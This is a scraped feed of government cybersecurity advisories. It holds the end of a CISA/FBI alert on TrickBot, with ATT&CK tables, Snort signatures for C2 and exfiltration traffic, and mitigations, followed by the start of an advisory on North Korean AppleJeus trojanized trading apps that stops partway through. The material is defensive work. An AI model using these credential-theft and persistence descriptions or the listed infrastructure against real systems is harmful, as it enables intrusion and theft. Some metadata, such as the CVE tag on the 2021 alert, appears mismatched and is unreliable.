[T1553.002](<https://attack.mitre.org/versions/v8/techniques/T1553/002/>) | TrickBot has come with a signed downloader component. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v8/techniques/T1562/001/>) | TrickBot can disable Windows Defender. \n \n_Credential Access _[[TA0006](<https://attack.mitre.org/versions/v8/tactics/TA0006/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nUnsecured Credentials: Credentials in Files | [T1552.001](<https://attack.mitre.org/versions/v8/techniques/T1552/001/>) | TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. \nUnsecured Credentials: Credentials in Registry | [T1552.002](<https://attack.mitre.org/versions/v8/techniques/T1552/002/>) | TrickBot has retrieved PuTTY credentials by querying the Software\\SimonTatham\\Putty\\Sessions registry key. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v8/techniques/T1555>) | TrickBot can steal passwords from the KeePass open-source password manager. \nCredentials from Password Stores: Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v8/techniques/T1555/003/>) | TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. \n \n_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v8/tactics/TA0007/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nSystem Service Discovery | [T1007](<https://attack.mitre.org/versions/v8/techniques/T1007/>) | TrickBot collects a list of install programs and services on the system\u2019s machine. \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v8/techniques/T1016>) | TrickBot obtains the IP address, location, and other relevant network information from the victim\u2019s machine. \nRemote System Discovery | [T1018](<https://attack.mitre.org/versions/v8/techniques/T1018>) | TrickBot can enumerate computers and network devices. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>) | TrickBot can identify the user and groups the user belongs to on a compromised host. \nPermission Groups Discovery | [T1069](<https://attack.mitre.org/versions/v8/techniques/T1069>) | TrickBot can identify the groups the user on a compromised host belongs to. \nSystem Information Discovery | [T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>) | TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim\u2019s machine. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v8/techniques/T1083>) | TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. \nAccount Discovery: Local Account | [T1087.001](<https://attack.mitre.org/versions/v8/techniques/T1087/001>) | TrickBot collects the users of the system. \nAccount Discovery: Email Account | [T1087.003](<https://attack.mitre.org/versions/v8/techniques/T1087/003>) | TrickBot collects email addresses from Outlook. \nDomain Trust Discovery | [T1482](<https://attack.mitre.org/versions/v8/techniques/T1482>) | TrickBot can gather information about domain trusts by utilizing Nltest. \n \n_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nLateral Tool Transfer | [T1570](<https://attack.mitre.org/versions/v8/techniques/T1570>) | Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol. \n \n_Collection_ [[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]\n\n**Technique Tactic ** | **ID** | **Use** \n---|---|--- \nData from Local System | [T1005](<https://attack.mitre.org/versions/v8/techniques/T1005>) | TrickBot collects local files and information from the victim\u2019s local machine. \nInput Capture:Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nPerson in the Browser | [T1185](<https://attack.mitre.org/versions/v8/techniques/T1185>) | TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage. \n \n_Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v8/tactics/TA0011/>)]\n\n**Technique Tactic ** | **ID** | **Use** \n---|---|--- \nFallback Channels | [T1008](<https://attack.mitre.org/versions/v8/techniques/T1008>) | TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>) | TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v8/techniques/T1105>) | TrickBot downloads several additional files and saves them to the victim's machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v8/techniques/T1132/001>) | TrickBot can Base64-encode C2 commands. \nNon-Standard Port | [T1571](<https://attack.mitre.org/versions/v8/techniques/T1571>) | Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. \nEncrypted Channel: Symmetric Cryptography | [T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>) | TrickBot uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic. \n \n_Exfiltration_ [[TA0010](<https://attack.mitre.org/versions/v8/tactics/TA0010/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>) | TrickBot can send information about the compromised host to a hardcoded C2 server. \n \n_Impact_ [[TA0040](<https://attack.mitre.org/versions/v8/tactics/TA0040/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nResource Hijacking | [T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>) | TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.\n\nalert tcp any [443,447] -&gt; any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|0b|example.com\"; fast_pattern:only; content:\"Global Security\"; content:\"IT Department\"; pcre:\"/(?:\\x09\\x00\\xc0\\xb9\\x3b\\x93\\x72\\xa3\\xf6\\xd2|\\x00\\xe2\\x08\\xff\\xfb\\x7b\\x53\\x76\\x3d)/\"; classtype:bad-unknown; metadata:service ssl,service and-ports;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'\"; sid:1; rev:1; flow:established,to_server; content:\"/anchor\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; pcre:\"/^\\/anchor_?.{3}\\/[\\w_-]+\\\\.[A-F0-9]+\\/?$/U\"; classtype:bad-unknown; priority:1; metadata:service http;)\n\nalert tcp any $SSL_PORTS -&gt; any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|31 0b 30 09 06 03 55 04 06 13 02|XX\"; nocase; content:\"|31 15 30 13 06 03 55 04 07 13 0c|Default City\"; nocase; content:\"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd\"; nocase; content:!\"|31 0c 30 0a 06 03 55 04 03|\"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'\"; sid:1; rev:1; flow:established,to_server; content:\"boundary=Arasfjasu7|0d 0a|\"; http_header; content:\"name=|22|proclist|22|\"; http_header; content:!\"Referer\"; content:!\"Accept\"; content:\"POST\"; http_method; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|WinHTTP loader/1.\"; http_header; fast_pattern:only; content:\".png|20|HTTP/1.\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}(?:\\x3a\\d{2,5})?$/mH\"; content:!\"Accept\"; http_header; content:!\"Referer|3a 20|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any $HTTP_PORTS -&gt; any any (msg:\"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'\"; sid:1; rev:1; flow:established,from_server; content:\"200\"; http_stat_code; content:\"Server|3a 20|Cowboy|0d 0a|\"; http_header; fast_pattern; content:\"content-length|3a 20|3|0d 0a|\"; http_header; file_data; content:\"/1/\"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"TRICKBOT:HTTP URI POST contains C2 Exfil\"; sid:1; rev:1; flow:established,to_server; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary\"; http_header; fast_pattern; content:\"User-Agent|3a 20|\"; http_header; distance:0; content:\"Content-Length|3a 20|\"; http_header; distance:0; content:\"POST\"; http_method; pcre:\"/^\\/[a-z]{3}\\d{3}\\/.+?\\\\.[A-F0-9]{32}\\/\\d{1,3}\\//U\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}$/mH\"; content:!\"Referer|3a|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"HTTP URI GET/POST contains '/56evcxv' (Trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"/56evcxv\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\nalert icmp any any -&gt; any any (msg:\"TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins 'hanc'\"; sid:1; rev:1; itype:8; content:\"hanc\"; offset:4; fast_pattern; classtype:bad-unknown;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomeware)\"; sid:1; rev:1; flow:established,to_server; content:\"POST\"; nocase; http_method; content:\"host|3a 20|\"; http_header; content:\".onion.link\"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:\"data=\"; distance:0; within:5; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -&gt; any $HTTP_PORTS (msg:\"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"host|3a 20|tpsci.com\"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\n### Mitigations\n\nCISA and FBI recommend that network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.\n\n * Provide social engineering and phishing training to employees.\n * Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.\n * Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.\n * Implement Group Policy Object and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-Based Message Authentication, Reporting &amp; Conformance validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications between network hoses, segments, and devices.\n * Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.\n * Enforce multi-factor authentication.\n * Enable a firewall on agency workstations configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity\n * Monitor web traffic. Restrict user access to suspicious or risky sites.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot.\n * Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * CISA Fact Sheet: TrickBot Malware\n * [MS-ISAC White Paper: Security Primer \u2013 TrickBot](<https://www.cisecurity.org/white-papers/security-primer-trickbot/>)\n * [United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>)\n * [CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-280a>)\n * [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)\n\n[[2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)\n\n### Revisions\n\nMarch 17, 2021: Initial Version|March 24, 2021: Added MITRE ATT&amp;CK Technique T1592.003 used for reconnaissance|May 20, 2021: Added new MITRE ATT&amp;CKs and updated Table 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-05-20T12:00:00", "type": "ics", "title": "TrickBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-05-20T12:00:00", "id": "AA21-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:54", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint advisory is the result of analytic efforts among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Treasury (Treasury) to highlight the cyber threat to cryptocurrency posed by North Korea, formally known as the Democratic People\u2019s Republic of Korea (DPRK), and provide mitigation recommendations. Working with U.S. government partners, FBI, CISA, and Treasury assess that Lazarus Group\u2014which these agencies attribute to North Korean state-sponsored advanced persistent threat (APT) actors\u2014is targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency.\n\nThese cyber actors have targeted organizations for cryptocurrency theft in over 30 countries during the past year alone. It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea\u2014the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts. As highlighted in [FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks](<https://us-cert.cisa.gov/ncas/alerts/aa20-239a>) and [Guidance on the North Korean Cyber Threat](<https://us-cert.cisa.gov/ncas/alerts/aa20-106a>), North Korea\u2019s state-sponsored cyber actors are targeting cryptocurrency exchanges and accounts to steal and launder hundreds of millions of dollars in cryptocurrency.[[1](<https://us-cert.cisa.gov/ncas/alerts/aa20-239a>)][[2](<https://home.treasury.gov/news/press-releases/sm924>)][[3](<https://www.justice.gov/opa/pr/two-chinese-nationals-charged-laundering-over-100-million-cryptocurrency-exchange-hack>)] The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit [https://www.us-cert.cisa.gov/northkorea](<https://us-cert.cisa.gov/northkorea>).\n\nThe U.S. Government has identified malware and indicators of compromise (IOCs) used by the North Korean government to facilitate cryptocurrency thefts; the cybersecurity community refers to this activity as \u201cAppleJeus.\u201d This report catalogues AppleJeus malware in detail. North Korea has used AppleJeus malware posing as cryptocurrency trading platforms since at least 2018. In most instances, the malicious application\u2014seen on both Windows and Mac operating systems\u2014appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate. In addition to infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.\n\nRefer to the following Malware Analysis Reports (MARs) for full technical details of AppleJeus malware and associated IOCs.\n\n * [MAR-10322463-1.v1: AppleJeus \u2013 Celas Trade Pro](<https://us-cert.gov/ncas/analysis-reports/ar21-048a>)\n * [MAR-10322463-2.v1: AppleJeus \u2013 JMT Trading](<https://us-cert.gov/ncas/analysis-reports/ar21-048b>)\n * [MAR-10322463-3.v1: AppleJeus \u2013 Union Crypto](<https://us-cert.gov/ncas/analysis-reports/ar21-048c>)\n * [MAR-10322463-4.v1: AppleJeus \u2013 Kupay Wallet](<https://us-cert.gov/ncas/analysis-reports/ar21-048d>)\n * [MAR-10322463-5.v1: AppleJeus \u2013 CoinGoTrade](<https://us-cert.gov/ncas/analysis-reports/ar21-048e>)\n * [MAR-10322463-6.v1: AppleJeus \u2013 Dorusio](<https://us-cert.gov/ncas/analysis-reports/ar21-048f>)\n * [MAR-10322463-7.v1: AppleJeus \u2013 Ants2Whale](<https://us-cert.gov/ncas/analysis-reports/ar21-048g>)\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nThe North Korean government has used multiple versions of AppleJeus since the malware was initially discovered in 2018. This section outlines seven of the versions below. The MARs listed above provide further technical details of these versions. Initially, HIDDEN COBRA actors used websites that appeared to host legitimate cryptocurrency trading platforms to infect victims with AppleJeus; however, these actors are now also using other initial infection vectors, such as phishing, social networking, and social engineering techniques, to get users to download the malware.\n\n### Targeted Nations\n\nHIDDEN COBRA actors have targeted institutions with AppleJeus malware in several sectors, including energy, finance, government, industry, technology, and telecommunications. Since January 2020, the threat actors have targeted these sectors in the following countries: Argentina, Australia, Belgium, Brazil, Canada, China, Denmark, Estonia, Germany, Hong Kong, Hungary, India, Ireland, Israel, Italy, Japan, Luxembourg, Malta, the Netherlands, New Zealand, Poland, Russia, Saudi Arabia, Singapore, Slovenia, South Korea, Spain, Sweden, Turkey, the United Kingdom, Ukraine, and the United States (figure 1).\n\n \n \n_Figure 1: Countries targeted with AppleJeus by HIDDEN COBRA threat actors since 2020_\n\n### AppleJeus Versions Note\n\nThe version numbers used for headings in this document correspond to the order the AppleJeus campaigns were identified in open source or through other investigative means. These versions may or may not be in the correct order to develop or deploy the AppleJeus campaigns.\n\n### AppleJeus Version 1: Celas Trade Pro\n\n#### **Introduction and Infrastructure**\n\nIn August 2018, open-source reporting disclosed information about a trojanized version of a legitimate cryptocurrency trading application on an undisclosed victim\u2019s computer. The malicious program, known as Celas Trade Pro, was a modified version of the benign Q.T. Bitcoin Trader application. This incident led to the victim company being infected with a Remote Administration Tool (RAT) known as FALLCHILL, which was attributed to North Korea (HIDDEN COBRA) by the U.S. Government. FALLCHILL is a fully functional RAT with multiple commands that the adversary can issue from a command and control (C2) server to infected systems via various proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware (_Develop Capabilities: Malware _[[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.[[4](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)]\n\nFurther research revealed that a phishing email from a Celas LLC company (_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002/>)]) recommended the trojanized cryptocurrency trading application to victims. The email provided a link to the Celas\u2019 website, `celasllc[.]com` (_Acquire Infrastructure: Domain _[[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]), where the victim could download a Windows or macOS version of the trojanized application.\n\nThe `celasllc[.]com` domain resolved to the following Internet Protocol (IP) addresses from May 29, 2018, to January 23, 2021.\n\n * `45.199.63[.]220`\n * `107.187.66[.]103`\n * `145.249.106[.]19`\n * `175.29.32[.]160`\n * `185.142.236[.]213`\n * `185.181.104[.]82`\n * `198.251.83[.]27`\n * `208.91.197[.]46`\n * `209.99.64[.]18`\n\nThe `celasllc[.]com` domain had a valid Sectigo (previously known as Comodo) Secure Sockets Layer (SSL) certificate (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Celas Trade Pro Application Analysis**\n\n#### _**Windows Program**_\n\nThe Windows version of the malicious Celas Trade Pro application is an MSI Installer (`.msi`). The MSI Installer installation package comprises a software component and an application programming interface (API) that Microsoft uses for the installation, maintenance, and removal of software. The installer looks legitimate and is signed by a valid Sectigo certificate that was purchased by the same user as the SSL certificate for celasllc[.]com (_Obtain Capabilities: Code Signing Certificates_ [[T1588.003](<https://attack.mitre.org/versions/v8/techniques/T1588/003/>)]). The MSI Installer asks the victim for administrative privileges to run (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]).\n\nOnce permission is granted, the threat actor is able to run the program with elevated privileges (_Abuse Elevation Control Mechanism_ [[T1548](<https://attack.mitre.org/versions/v8/techniques/T1548/>)]) and MSI executes the following actions.\n\n * Installs `CelasTradePro.exe` in folder `C:\\Program Files (x86)\\CelasTradePro`\n * Installs `Updater.exe` in folder `C:\\Program Files (x86)\\CelasTradePro`\n * Runs `Updater.exe` with the `CheckUpdate` parameters\n\nThe `CelasTradePro.exe` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe `Updater.exe` program has the same program icon as `CelasTradePro.exe`. When run, it checks for the `CheckUpdate` parameter, collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (_Exfiltration Over C2 Channe_l [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). It has very similar functionality to the Windows version. The installer executes the following actions.\n\n * Installs `CelasTradePro` in folder `/Applications/CelasTradePro.app/Contents/MacOS/`\n * Installs `Updater` in folder `/Applications/CelasTradePro.app/Contents/MacOS`\n * Executes a `postinstall` script \n * Moves `.com.celastradepro.plist` to folder `LaunchDaemons`\n * Runs `Updater` with the `CheckUpdate` parameter\n\n`CelasTradePro` asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\n`Updater` checks for the `CheckUpdate` parameter and, when found, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033]](<https://attack.mitre.org/versions/v8/techniques/T1033>)), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]). This process helps the adversary obtain persistence on a victim\u2019s network.\n\nThe `postinstall` script is a sequence of instructions that runs after successfully installing an application (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). This script moves property list (`plist`) file `.com.celastradepro.plist` from the installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). The leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing (_Hide Artifacts: Hidden Files and Directories_ [[T1564.001](<https://attack.mitre.org/versions/v8/techniques/T1564/001/>)]). Once in the folder, this property list (`plist`) file will launch the `Updater` program with the `CheckUpdate` parameter on system load as Root for every user. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches the `Updater` program with the `CheckUpdate` parameter and runs it in the background (Create or _Modify System Process: Launch Daemon _[[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nAfter a cybersecurity company published a report detailing the above programs and their malicious extras, the website was no longer accessible. Since this site was the C2 server, the payload cannot be confirmed. The cybersecurity company that published the report states the payload was an encrypted and obfuscated binary (_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>)]), which eventually drops FALLCHILL onto the machine and installs it as a service (_Create or Modify System Process: Windows Service _[[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]). FALLCHILL malware uses an RC4 encryption algorithm with a 16-byte key to protect its communications (_Encrypted Channel: Symmetric Cryptography_ [[T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>)]). The key employed in these versions has also been used in a previous version of FALLCHILL.[[5](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)][[6](<https://attack.mitre.org/versions/v8/software/S0181/>)]\n\nFor more details on AppleJeus Version 1: Celas Trade Pro, see [MAR-10322463-1.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048a>).\n\n### **AppleJeus Version 2: JMT Trading**\n\n#### **Introduction and Infrastructure**\n\nIn October 2019, a cybersecurity company identified a new version of the AppleJeus malware\u2014JMT Trading\u2014thanks to its many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which a legitimate-looking company, called JMT Trading, marketed and distributed on their website, `jmttrading[.]org` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). This website contained a \u201cDownload from GitHub\u201d button, which linked to JMT Trading\u2019s GitHub page (_Acquire Infrastructure: Web Services_ [[T1583.006](<https://attack.mitre.org/versions/v8/techniques/T1583/006>)]), where Windows and macOS X versions of the JMT Trader application were available for download (_Develop Capabilities: Malware_ [[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). The GitHub page also included .zip and tar.gz files containing the source code.\n\nThe `jmttrading[.]org` domain resolved to the following IP addresses from October 15, 2016, to January 22, 2021.\n\n * `45.33.2[.]79`\n * `45.33.23[.]183`\n * `45.56.79[.]23`\n * `45.79.19[.]196`\n * `96.126.123[.]244`\n * `146.112.61[.]107`\n * `184.168.221[.]40`\n * `184.168.221[.]57`\n * `198.187.29[.]20`\n * `198.54.117[.]197`\n * `198.54.117[.]198`\n * `198.54.117[.]199`\n * `198.54.117[.]200`\n * `198.58.118[.]167`\n\nThe `jmttrading[.]org` domain had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence. The current SSL certificate was issued by Let\u2019s Encrypt.\n\n#### **JMT Trading Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious cryptocurrency application is an MSI Installer. The installer looks legitimate and has a valid digital signature from Sectigo (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for `jmttrading[.]org` (_Obtain Capabilities: Code Signing Certificates_ [[T1588.003](<https://attack.mitre.org/versions/v8/techniques/T1588/003/>)]). The MSI Installer asks the victim for administrative privileges to run (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]).\n\nOnce permission is granted, the MSI executes the following actions.\n\n * Installs `JMTTrader.exe` in folder `C:\\Program Files (x86)\\JMTTrader`\n * Installs `CrashReporter.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\JMTTrader`\n * Runs `CrashReporter.exe` with the `Maintain` parameter\n\nThe 